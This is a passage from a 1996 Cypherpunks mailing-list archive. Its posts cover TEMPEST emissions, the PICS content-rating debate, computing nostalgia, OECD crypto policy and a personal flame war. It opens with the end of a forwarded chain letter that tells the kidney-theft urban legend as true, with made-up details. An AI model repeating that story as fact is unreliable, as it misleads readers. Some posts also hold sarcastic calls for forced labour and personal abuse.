>| >>> >filled with ice.  He was still feeling the effects of the drugs,
>| >but
>| >>> >looked around to see he was alone.
>| >>> >
>| >>> >He looked down at his chest, which had "CALL 911 OR YOU WILL DIE"
>| >>> >written on it in lipstick.  He saw a phone was on a stand next to
>| >>> >the tub, so he picked it up and dialed.  He explained to the EMS
>| >>> >operator what the situation was and that he didn't know where he
>| >was,
>| >>> >what he took, or why he was really calling.  She advised him to get
>| >>> >out of the tub.  He did, and she asked him to look himself over in
>| >>> >the mirror.  He did, and appeared normal, so she told him to check
>| >>> >his back.  He did, only to find two 9 inch slits on his lower back.
>| >>> >She told him to get back in the tub immediately, and they sent a
>| >>> >rescue team over.
>| >>> >
>| >>> >Apparently, after being examined, he found out more of what had
>| >>> >happened.  His kidneys were stolen.  They are worth 10,000 dollars
>| >>> >each on the black market.  (I was unaware this even existed.)
>| >>> >Several guesses are in order:
>| >>> >The second party was a sham, the people involved had to be at least
>| >>> >medical students, and it was not just recreational drugs  he was
>| >>> >given.
>| >>> >
>| >>> >Regardless, he is currently in the  hospital on life  support,
>| >>> >awaiting a spare kidney. The University of Texas in conjunction
>| >>> >with Baylor University Medical Center is conducting tissue research
>| >>> >to match the sophomore student with a donor.
>| >>> >
>| >>> >Any information leading to the arrest of the individuals may be
>| >>> >forwarded to the University of Texas Campus police, or the Texas
>| >>> >Rangers.
>| >>> >









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Sat, 7 Dec 1996 20:41:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Laptops and TEMPEST
Message-ID: <199612080443.UAA01700@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



I'll bet that the laptop that was radiating stuff was doing it from
the external VGA port that many laptops have, rather than from the
LCD screen.

thad
-- Thaddeus Beier                     thad@hammerhead.com
   Visual Effects Supervisor                408) 287-6770
   Hammerhead Productions  http://www.got.net/people/thad




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: varange@crl.com (Troy Varange)
Date: Sat, 7 Dec 1996 21:24:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: wealth and property rights
Message-ID: <Love@23099>
MIME-Version: 1.0
Content-Type: text/plain


If the free market is a good thing, that it's a democratic way of
getting the best to the top of the economic ladder, then I see no
reason why this should not also apply to politics.

The people have every right to use democracy to establish a
non-democratic system re: abolishment of the wealthy as a class
and sentencing the entire Forbes 400 and their underlings to 25
years at forced labor, say 16 hour days at picking vegetables
under the pain of the knouted whip.

No Libertarian could oppose the use of the political free market
of democracy for undemocratic ends; that would violate the spirit
of liberty!

-- 
Cheers!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Sat, 7 Dec 1996 21:13:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
Message-ID: <199612080515.VAA01745@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net ("Timothy C. May") sez
> This is why I fear PICS. Democracy has run amok in the Western world, and
> the various "herds" will vote to constrain the freedoms of other members of
> the herd.
> 
> My Prediction: If PICS is used voluntarily by more than 80% of Net users to
> label their Web pages and their writings, etc., then less than 3 years
> later PICS will be mandated in the United States and other such countries.

PICS, or something like it, is the absolutely right response to calls
for true Internet censorship.  People agreeing to a language, a way
of communicating, is a good thing.

Did you object to HTML?  TCP/IP?  Other agreements that limited the way
that people communicate?

I don't think that PICS will be mandated any more than those two standards
are mandated, perhaps I'm naive, but I think that the social conventions
will work in this case.

I suppose the a better solution would have been to have many competing
private rating services, but PICS will work well, not put much load on
the net, and is transparent and simple.  I like it.

thad
-- Thaddeus Beier                     thad@hammerhead.com
   Visual Effects Supervisor                408) 287-6770
   Hammerhead Productions  http://www.got.net/people/thad




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Sat, 7 Dec 1996 15:51:55 -0800 (PST)
To: tcmay@got.net>
Subject: Re: The Science Generations
In-Reply-To: <199612060723.XAA21230@netcom7.netcom.com>
Message-ID: <199612072353.QAA19021@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <199612060723.XAA21230@netcom7.netcom.com>, on 12/05/96 
   at 11:27 PM, frantz@netcom.com (Bill Frantz) said:

::At  8:44 PM 12/5/96 -0800, Timothy C. May wrote:
::>* Generation 1: The kids of the 1920s-40s. The Ernest Lawrences and the
::>Robert Noyces, who grew up on farms, repairing tractors and farm
::>machinery. They learned about machinery at a direct level. These were
::>the giants of the post-war science community, and the founders of
::>modern American chip companies.
::>
::>* Generation 2: The Sputnik generation, of the 1950s-60s. They grew up
::>with Gilbert chemistry sets, Erector sets, "All About" books, and with
::>constant exposure to nuclear physics, relativily, molecular biology,
::>etc. These were the workers who staffed the companies formed by the
::>Noyces and Moores of the world, and the young scientists who pioneered
::>the use of computers.
::> 
::>* Generation 3: The computer generation. The 1970s-80s, who grew up
::>with Commodore PETs and Apple IIs (and some later machines). These are
::>the "new pioneers"  of the 1980s-90s, the Marc Andreesens and the like.

::I am definitly from Generation 2.  I have tried to interest my children
::in playing with ICs and various electronic pieces.  I have also worked
::hand-in-hand with them, rebuilding auto engines and transmissions.  We
::will see how it plays out.

    well, I class out as a Generation 1, born before the war --as a 
    multi-disciplined generalist.  during the 70s and 80s, we sat 
    in the king's chair when they need us. by the late 80s and in 
    the 90s, all they want are narrowly focused specialists, ignoring
    the generalist concept of overview and understanding the "big 
    picture. we are considered too broad to understand the high tech...  
    --and obsolete. 

    I used to call most of my contracts "on the job training"  --but 
    the point of a generalist is the ability to comprehend the narrow 
    field and separate the bullshitters and space-shot dreamers from 
    the doers.  just who on that team can cooperate well enough to
    get it out the door when it is months (or years) behind.  it was
    the last legal stand of the man with a mask and gun.

    My only complaint is that generation 1 generalists were dead about 
    five years too soon --unless you were Gordon Moore, etc.  those of 
    us who were cowboys --the last and best gunslingers in the West; 
    we were passe. I never once in my 35 year career collected a W2 
    wage, (and sometimes none in any form --feast or famine).

    Tim May probably pulled off the best of all gigs --on the Intel
    wagon as it went down, with stock options which gave Tim full
    independence in his low forties.

    I may not have much of a pot to piss in, but it was one long
    rockin' and rollin' ride  --basket to hell and all. you don't 
    look back, you just slam the throttle forward --same way I fly 
    stunt planes or hang from the apes of my hawg.  

    several of my five children are true generalists. have I (am I)
    advised them to go the route of the cowboy --not on your life! 

    but I certainly do not recommend engineering in any form --they 
    would be bored out of their squashs and in-trouble/restless all 
    their lives.  I encourage academia --the last refuge of the 
    absent-minded professors and researchers.  I do not like academia
    in general, but at least you can breath. 

    all the government wants and expects is mindless robots, useless 
    automans. I have "persuaded" more than one school district and its 
    teachers to stop playing with my kids' heads, trying to change 
    them to Hillary's mold for a global village... (so I practiced a 
    little: "...intimidation is just another form of communication"  
    --BFD, whatever works...).

    even today's computer kids are poorly focused; they have no concept
    of what's under the hood, or why!  they have no interest in the
    technology, methodology, or the modular concept of solution.
    they in the turn, and sooner than later, will be burned out without
    a clue of how to improve the interrelated functions.

    grade school children with calculators???  how are they supposed to
    absorb the rote learnign drill which makes it possible to "think on
    your feet?" The ability to mentally calculate and visualize are the
    keys of a generalist.

    *generation 4:  MTV and power action games of death and violence.

        actually, I am not qualified to speak on either. I have never
        allowed a TV or video game in my house.

- --
  without arms they do not resist; 
    without communication they know not what to resist.
        -attila

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMqoCQL04kQrCC2kFAQHBUAQAxItjS573rKpQ2NgAD77JuOcy2s/a6aFj
sbak8xWZ4rwd0dlTeTIZc2ahjIIGDDY/QEiFxonz0M6i0T+BJkRyUawOY0XakYEb
uhumEO1VWcbj6IdA+zfi1sC5VMEQTXGP4S88VBF0FQDfibdGlxTOa0DECG3jYp12
AOlXiS5fwcE=
=sfql
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Sun, 8 Dec 1996 00:54:55 -0800 (PST)
To: paul@fatmans.demon.co.uk
Subject: Re: What's a "fingerprint" ?
Message-ID: <850034599.56426.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




> Subject:       Re: What's a "fingerprint" ? 


Sorry punks, 

my mailer somehow posted my reply to this question 5 or 6 times, the 
spam was not intentional...

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Sun, 8 Dec 1996 00:59:18 -0800 (PST)
To: Ken Kirksey <kkirksey@appstate.campus.mci.net>
Subject: Re: "Family Channel" of the Internet?
Message-ID: <850034600.56427.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> inspected and approved.  He said that they were going to do this, again I 
> quote, "using the same encryption that Visa and Mastercard use."  The 
> last statment pegged my bogometer, of course.  

Sounds distinctly bogus to me...

> 1) Is it technically possible for them to limit access to only approved 
> IP addresses?  If so, how can they do this, and is it possible to get 
> around these measures.

Yes, there are a number of ways probably the easiest of which would 
be a proxy server. A number of corporations have these set up so 
their employees spend more time looking at relevant information and 
less looking at porn sites ;-)
 
> 3) In general, how would you use crypto to ensure that your users only 
> connected to approved sites, regardless of the platform or browser 
> software they were using?

I assume here he means that the pages will be encrypted at the ISP 
end and the browser will only decrypt the pages the user logged on at 
that time has access to. This all sounds very confused to me, he is 
talking bollocks I would wager.
 
> I asked the guy to send me some technical details.  If I receive them, 
> I'll share unless he makes me sign an NDA.

I would be interested to see them but would guess at this point he 
doesn`t quite understand what he`s talking about himself... 


  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sat, 7 Dec 1996 23:37:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: cause for alarm
Message-ID: <3.0.32.19961207233839.00696dbc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain



The dec96 issue of _cause for alarm_ has hit the web.
You can get to it via the home page, at:

http://www.teleport.com/~richieb/cause/

_cause for alarm_ is a zine which explores threats to
freedom of speech, as well as other online freedoms.

This month's features focus on the persecution of
Bernie S, and the landmark Bernstein v US Department
of State crypto case.

Past topics have included a primer on starting local
activist groups, Intel's hosing of Perl wizard Randal
Schwartz, and the Church of Scientology. Also, interviews
with prominent Net activists.

I'm seeking contributions for future issues. If you'd
like more info, point your web browser at:

http://www.teleport.com/~richieb/cause/submit.html

Or send email to richieb@teleport.com with the words
"submission guidelines" (without the quotes) in the
subject line of your message.



Rich Burroughs
Editor and Publisher, cause for alarm
http://www.teleport.com/~richieb/cause/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Sat, 7 Dec 1996 16:26:31 -0800 (PST)
To: Lucky Green <cypherpunks@toad.com>
Subject: Re: Laptops and TEMPEST
In-Reply-To: <3.0.32.19961207151252.0068e328@netcom14.netcom.com>
Message-ID: <199612080027.RAA19767@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.32.19961207151252.0068e328@netcom14.netcom.com>, on 12/07/96 
   at 03:12 PM, Lucky Green <shamrock@netcom.com> said:

::    As for any government directives requiring companies to make 
::    computers leak, I know of none, but CAVEAT: I've been retired
::    from source info since '91, and most of my friends/fellow engrs
::    who occasionally got together for a few brewskis and BS sessions
::    over in Mt. View have either gone to better jobs (more $$$),
::    transferred back east, or inconsiderately died.  So, who
::    knows? 

    are you, as well as your correspondent, showing your age, already?

    slides up on you. I didn't need reading glasses until 55 --but, 
    wow, did it head for the far end of the range in just a few months.

- --
  Now, with a black jack mule you wish to harness, you walk up, 
  look him in the eye, and hit him with a 2X4 over the left eye.   
  If he blinks, hit him over the right eye! He'll cooperate.  
        --so will politicians.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMqoK5L04kQrCC2kFAQFGlAQAv/XDHYKdc1Ma+0zhOcy6cJI0V47w76co
BI576BrBG83G4O5Ipp0GiT5vzA+3AE44x0wGhZMNKTf9UsGFR9GgK5HP3xD2FcdV
97+aCmoy7ZsfqsVCRUQDh8e5OoQJ/VymTyKuaIdVlJ8Zfw6CJXyIM+0yxFxoCtrr
M/jC/jq0uuI=
=Pv7C
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 8 Dec 1996 00:18:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
Message-ID: <199612080818.AAA05613@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:02 PM 12/7/96 -0800, Timothy C. May wrote:
>So, as long as PICS is fully voluntary, and I mean _fully_ voluntary, civil
>libertarians will likely not object. After all, it's just a system _some_
>other people (maybe even most) are voluntarily adhering to. However, the
>pressure to stop "rogues" from "subverting" the PICS system by either not
>using it, or by deliberately monkeywrenching it, will be enormous.

The last time I looked at PICS, there was a mode where sites were checked
against a third party "PICS server", and a mode which used signed ratings. 
Now I am not saying these modes can't be hacked.  I don't remember the
details well enough.  But they should be somewhat resistant to problems
with false self-rating.  (How these "PICS servers" and "Rating signers"
keep up with the number of sites and the growth of web page publishing is
not at all clear.  It would seem to me that it would require many people. 
Perhaps the Christian Coalition can put together a cooperative effort among
their members.)

Note that the "PICS server" approach has major privacy problems.  However,
I don't think that many censors are interested in privacy, so they may not
be a barrier to censorious parents.


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: furballs <furballs@netcom.com>
Date: Sun, 8 Dec 1996 00:37:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PICS is not censorship
In-Reply-To: <199612080515.VAA01745@hammerhead.com>
Message-ID: <Pine.3.89.9612072304.A7118-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 7 Dec 1996, Thaddeus J. Beier wrote:

> tcmay@got.net ("Timothy C. May") sez
> > This is why I fear PICS. Democracy has run amok in the Western world, and
> > the various "herds" will vote to constrain the freedoms of other members of
> > the herd.
> > 
> > My Prediction: If PICS is used voluntarily by more than 80% of Net users to
> > label their Web pages and their writings, etc., then less than 3 years
> > later PICS will be mandated in the United States and other such countries.
> 
> PICS, or something like it, is the absolutely right response to calls
> for true Internet censorship.  People agreeing to a language, a way
> of communicating, is a good thing.
> 
> Did you object to HTML?  TCP/IP?  Other agreements that limited the way
> that people communicate?
> 
> I don't think that PICS will be mandated any more than those two standards
> are mandated, perhaps I'm naive, but I think that the social conventions
> will work in this case.
> 
> I suppose the a better solution would have been to have many competing
> private rating services, but PICS will work well, not put much load on
> the net, and is transparent and simple.  I like it.
> 
> thad

I disagree.

If people want a rating system, then they should voluntarily do it, not 
have it shoved down their throats "for their own good".

Your examples are bogus in the light of what PICS is and what TCP/IP is. 
One is a transport layer, the other a label for flagging. While both can 
control the flow of information, there is a big difference between the 
political behavior of the two as seen by the great unwashed who fain to rule 
over us.

TCP/IP to them means nothing becuase they do not understand it's relation 
to content. However, they do understand PICS as it's whole existence is 
to delineat and ultimately control content. They pushed the development 
of PICS and it's ilk for the express purpose of *control*. TCP/IP was 
developed for the express purposed of common ground for dissemination.

I would suggest you rethink the position. I'll give you a better example 
of why PICS *wont* work despite the Clintonista's claim of caring for 
children.

You remember Playboy. That magazine was a right of passage for many a 12 
or 13 year old boy who could get his hands on it. Could they buy it? No, 
that was against the law. So where did they get it? Dad, ofcourse. His 
subscription came every month, and "johnny" had no trouble finding it 
once Dad hid it. Or, it came by way of "johnny's" big brother's room; or 
a friend with the same circumstances at his home. 

Regardless of the smut laws on the books, regardless of how zealous the 
local constable was in rooting out the evils of pornography, you could 
find the magazine and pre-teens willing to look in many places.

Did the government ban Playboy? No.. So why do you think they are all 
fired up about banning smut on the Internet (which BTW is international 
in scope) ? I'll tell you why... control, plain and simple control of 
information.

Let's go back to one small piece of the CDA: the phrase "patently 
offensive". Now, I have yet to see a *consistent* legal defintion of 
obscene, much less "patently offensive".

Now, let's suppose that someone publishes a piece that says to the effect 
"I think that Clinton is a complete idiot because of policies 'X', 'Y', 
and 'Z'" and critiques them verbalizing reasons why these policies are a 
failure. What's to stop her majesty and Bill from saying "We are patently 
offended by this material"? Nothing. Nothing now. But, if the CDA is 
enforced, then it is not unreasonable to forsee another shade of grey 
come into being by making it a jailable offense to openly critisize the 
government's mandated policies as it goes to (Clinton's favorite 
euphemism) "National Security and the reputation of the United States 
amongst it's peers". (Not that we enjoy any peerage these days).

Any legal manuevering that restricts legitimate critism of the federal 
goverment's policies, actions, or positions diminshes the effectiveness 
of the First Amendment. If our elected officials can not be publicly 
chastized and shamed into enacting good policy or dispensing the will of 
the people, then we have a Republic in name only.

That is why the Consitutuion starts with "We the People of the United 
States..." not "We the Government of the United States..." That is why 
the First Amendment is about free speech and the Second Amendment 
concerns the right to bear arms. The Founding Fathers believed in the 
people's ability to "adjust" government when government became like 
George III.

On the surface, PICS seems harmless to the average person. It's the hue 
and cry "ofcourse we should protect our children!" From what? Themselves? 
Other people? Good Information? Bad Information? (choice your poison). 
More to the point, it is people wanting to alleveat their responsibility 
as parents from dealing with their children. They are willing to give up 
a portion of their free agency to try and avoid parenting and the 
government is only too eager to help.

One question: can you really legislate morality and make it stick?

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Sat, 7 Dec 1996 19:37:33 -0800 (PST)
To: Eric Blossom <cypherpunks@toad.com>
Subject: Re: The Science Generations
In-Reply-To: <199612071749.JAA08668@comsec.com>
Message-ID: <199612080338.UAA24072@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <199612071749.JAA08668@comsec.com>, on 12/07/96 
   at 09:49 AM, Eric Blossom <eb@comsec.com> said:

::> Indeed, in the 1970s I was using H-P 9825s and DEC PDP 11/34s, but 
::> the teenagers of that decade were, if they were fortunate and 
::> energetic, using PETs, Apple IIs, and the like.

::Right On!  PDP 11's rule!!!

::My favorite one was an 11/34 with "Hardware Floating Point" that had a 
::GT-43 vector display processor as a coprocessor.  
::
        that's what I thought until my 11/44 rolled in!   

::You'd build a double 
::buffered display list of vector instructions for the coprocessor, 
::using your handy dandy fortran program, and then let it rip.  As long 
::as you weren't trying to do hidden line removal, or draw more than 
::about 200 vectors, you could get smooth, real-time wire frame 
::animation.  We had it hooked up to a couple of knob boxes and some 
::nice three axis joy sticks connected to 10 bit A/D's.
::
        you're showing your age, too!  

        remember the old, old Logo before the IBM PC --ran on an 11/34?  
    and the sandbox for the turtle. I still had an 11/34 when my 
    youngest son was 2-3; and he would spend hours driving the turtle 
    with its headlight in the sand, trailing its umbilical cord until 
    he would hopelessly entangle it 

        --and the old DEC Gigi keyboard which was only produced for 
    educational sales --I managed to acquire a salesman's demo.

        I still have the Gigi, the special color monitor, and the
    source code tape from U of Toronto via DEC --compiled it on V6
    UNIX if I remember, then Berkeley 3.9  for the 11/44 I had just
    acquired which was obsoleted by a pair of Vaxen in about a year.

        am I showing my age, yet?

        BTW, I think I can still read 9 track tapes.  The old Pertec
    800/1600 is still racked with a minivax with Ultrix V7. anyone
    still wish to play with that old dinosaur?

- --
  Cyberspace is OUR Freedom.  
    FUCK your CDA! and, FUCK your WIPO, too.
        -attila


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMqo3wr04kQrCC2kFAQF7nwP+LM3FpVutojYbQCFPrRpOJZqtLC7r5+pw
68yo0gV0xmaMwVvkNSE48x4Y9ApkuLurE6wjDP1OyqY2IpF4vqORejpass223qtU
Iz7mlds+uMP11nnct34OF+Q4vkE+ey5xHhd6Xz1ejRQ0wUaA23NWEabQPMr2iLEd
1aL5uPkp0c0=
=F0ZH
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robin Whittle" <firstpr@ozemail.com.au>
Date: Sat, 7 Dec 1996 09:22:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: PICS is not censorship
Message-ID: <199612071722.EAA26996@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


I do not believe that PICS is a form of censorship, except for those 
people - children and employees - whose computing environment is 
beyone their direct control and who have to live with a browser that 
filters based on PICS labels.

For much, much more on the Internet content regulation debate, see my 
WWW site.

PICS is basically an excellent idea in my view.  It provides a means 
of child protection which is not censorship of the net or censorship 
of sources of information.  It is also useful for other things.  

However I don't beleive it is practical or desirable to insist that
all people use PICS and a particular value system to label their WWW
material - there is likely to be no suitable value system which is
adequate in all situations.

- Robin


> From:          stewarts@ix.netcom.com
> Date:          Wed, 04 Dec 1996 22:23:04 -0800
> To:            cypherpunks@toad.com
> Subject:       W3C Picks PICS for Censorship

> >> W3C ISSUES PICS AS A RECOMMENDATION; PICS READY FOR WIDESPREAD
>    ADOPTION; ENABLING USERS TO FILTER INTERNET CONTENT WITHOUT
>    CENSORSHIP - The World Wide Web Consortium today endorsed the
>    Platform for Internet Content Selection specifications as a W3C
>    Recommendation. This Recommendation represents the W3C's highest
>    "Stamp of Approval." It signifies that PICS specifications are stable
>    ... [Business Wire, 854 words]
> 
> #			Thanks;  Bill
> # Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
> # You can get PGP outside the US at ftp.ox.ac.uk
> #     (If this is posted to cypherpunks, I'm currently lurking from fcpunx,
> #     so please Cc: me on replies.  Thanks.)


. Robin Whittle                                               .
. http://www.ozemail.com.au/~firstpr   firstpr@ozemail.com.au .
. 11 Miller St. Heidelberg Heights 3081 Melbourne Australia   .
. Ph +61-3-9459-2889    Fax +61-3-9458-1736                   .
. Consumer advocacy in telecommunications, especially privacy .
.                                                             .
. First Principles      - Research and expression - music,    .
.                         music industry, telecommunications  .
.                         human factors in technology adoption.
.                                                             .
. Real World Interfaces - Hardware and software, especially   .
.                         for music                           .




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robin Whittle" <firstpr@ozemail.com.au>
Date: Sat, 7 Dec 1996 09:22:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: OECD policy: constructive comments?
Message-ID: <199612071722.EAA27014@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


The US, French and UK government policies on crypto control are 
stupid.

The OECD has a group of so-called experts who are likely to reach the 
same conclusion about how governements "must" have access to the 
content of criminal communications.

For a commented version of a leaked draft the OECD crypto guidelines, 
see my WWW site.  Recently I got some email from someone at the OECD 
who is on the secretariat working on this.  The didn't seem to mind 
me publishing the draft and they seemed to appreciate my comments.

These people seem to be in their own government circle - but if you 
can get through to them, at least some of them will listen.  They are 
likely to be intelligent, concerned people, but due to their lack of 
wide perspective (something they really should be working harder on, 
for sure) they may come up with some totally unrealistic policies.

In fact, most of the draft seems to be really good - it is only the 
last bit on law-enforcement access which is crook and this seems to 
be at odds with the rest of the draft.

It is no good complaining about them sitting in their bunker if we 
won't crawl out of ours.  If you have some constructive comments on 
the draft, let me know and I will put you in touch with the OECD 
secretariat.  

- Robin


> Date:          Thu, 5 Dec 1996 08:00:32 -0500
> From:          C Matthew Curtin <cmcurtin@research.megasoft.com>
> To:            cypherpunks@toad.com
> Subject:       Encryption policy challenged 

> http://www.news.com/News/Item/0,4,5909,00.html?dtn.head
> 
> "The Business Software Alliance, a powerful Washington trade
> organization, warned the White House that its encryption policy will
> fail if the government does not turn to the industry for guidance."
> 
> blah blah blah ...
> 
> Interesting how these polite requests from the SBA, et al, are going
> for such ridiculously low goals. Being able to export 56-bit symmetric
> cipher products... Why in the world go for such a low number when that
> is the absolute *best* that you can possibly get? And with such a
> small difference between 56 and 40 bits, there isn't really any room
> to haggle.
> 
> Duh.
> 
> -- 
> Matt Curtin  cmcurtin@research.megasoft.com  Megasoft, Inc   Chief Scientist
> http://www.research.megasoft.com/people/cmcurtin/   I speak only for myself.
> Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet


. Robin Whittle                                               .
. http://www.ozemail.com.au/~firstpr   firstpr@ozemail.com.au .
. 11 Miller St. Heidelberg Heights 3081 Melbourne Australia   .
. Ph +61-3-9459-2889    Fax +61-3-9458-1736                   .
. Consumer advocacy in telecommunications, especially privacy .
.                                                             .
. First Principles      - Research and expression - music,    .
.                         music industry, telecommunications  .
.                         human factors in technology adoption.
.                                                             .
. Real World Interfaces - Hardware and software, especially   .
.                         for music                           .




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 8 Dec 1996 05:20:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: cypher-PUNKS...
In-Reply-To: <Pine.LNX.3.94.961208053743.8090B-100000@random.sp.org>
Message-ID: <31BmyD51w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


More fan mail from John Gilmore and his friends:

>Received: from random.sp.org (deviant@random.sp.org [152.52.195.2]) by random.sp.org (8.6.12/8.6.12) with SMTP id FAA08153 for <dlv@bwalk.dm.com>; Sun, 8 Dec 1996 05:39:40 GMT
>Date: Sun, 8 Dec 1996 05:38:57 +0000 (GMT)
>From: The Deviant <deviant@pooh-corner.com>
>X-Sender: deviant@random.sp.org
>To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
>Subject: Re: cypher-PUNKS...
>In-Reply-To: <gTykyD29w165w@bwalk.dm.com>
>Message-Id: <Pine.LNX.3.94.961208053743.8090B-100000@random.sp.org>
>Organization: The Silicon Pirates
>Mime-Version: 1.0
>Content-Type: TEXT/PLAIN; charset=US-ASCII
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>On Sat, 7 Dec 1996, Dr.Dimitri Vulis KOTM wrote:
>
>> "Timothy C. May" <tcmay@got.net> writes:
>> > I've initiated more threads on crypto-related and politico-crypto topics
>> > than nearly anyone else.
>>
>> Ritalin, attacks on Mormons, assault rifles, attacks on "crazy Russians"...
>>
>> Crackpot spammer Timmy May (fart) lies again.
>
>Dimitri, just go away.  Tim _has_ initiated more crypto-relivant
>discussions on this list than anybody else I can think of, and the only
>thing I've seen you initiating around here is spam wars.  Just go the hell
>away.
>
> --Deviant

Silly Deviant,

How could Timmy May initiate a crypto-relevant thread if he knows nothing
about crypto? Timmy posted a series of message via anonymous remailers
praising himself and calling himself "a genius among geniuses" or some such.
What a moron.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 8 Dec 1996 10:15:34 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: The Science Generations
In-Reply-To: <199612080818.AAA05597@netcom7.netcom.com>
Message-ID: <32AB0479.41BD@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz wrote:
> Off list 'cause it's off topic.
> Dale - My experiences don't parallel yours.  (BTW - I agree that HP makes
> good equipment.  HP has always been one of the industries class acts.  I
> just don't agree that you couldn't do small business computing on
> Apple/IBM/Osborne etc. because many people did it.)
> I never used an Apple ][ hard disk, but I worked in a room with perhaps 30
> IBM PCs with the first 5MB disks for about three years.  Don't ever
> remember any of them crashing.
> Yea, I remember doing that once in the eight years or so we ran the system.
> Better reliability than some 4 function calculators I had. The point is
> not that these systems were better than your beloved HPs.  The point is
> that they were good enough so many people used them for serious applications.
> Applications that earned these systems a place in the business.
> Applications that returned more to the business than the cost of the systems.

The phrase "your beloved HPs" gives your hand away.  The truth is, many
customers I knew would reiterate exactly what you said. But when I would
press for details, I would find that they were *very* lightweight apps,
and the ability to deliver day in day out was essentially nonexistent.
BTW, I don't see above where you said what would happen to the IBMs or
Apples when the power shut off while writing to the hard disk....
And Apples and IBMs *did* require surge protectors, not provided by the
manufacturer.  And neither Apple or IBM would repair their own stuff.
This last point is very important to me, but I can see where it would
be lost on non-professional users.

HPs were made for use in less than ideal environments, which is why:

1. When you use an HP or Apple in lots of areas of Southern California,
particularly close to the ocean where most people live, the HP will
perform for a long time and the Apple will corrode rather quickly.

2. When I went to a show in Anaheim once in the summer, and the air
conditioning quit, and the temperature reached 100+ fahrenheit in the
display areas, the HPs were the only micros still running.

3. As far as calculators go, try leaving several CMOS machines in your
locked car with windows up in the summer for, say, 3 or 4 hours while
you're inside of a mall, to name an example.  See which ones still have
their CMOS data intact.

To sum up, when you haven't had to depend on professional gear for real
production work at home or on the road, you can't make these kinds of
judgements knowledgeably.  The main gripe I have about postings like
this is that they argue on emotion about a technical issue.

HP is far from a *good* company these days.  Matter of fact, the day
that they introduced the HP-150 (touchscreen) computer, they yanked the
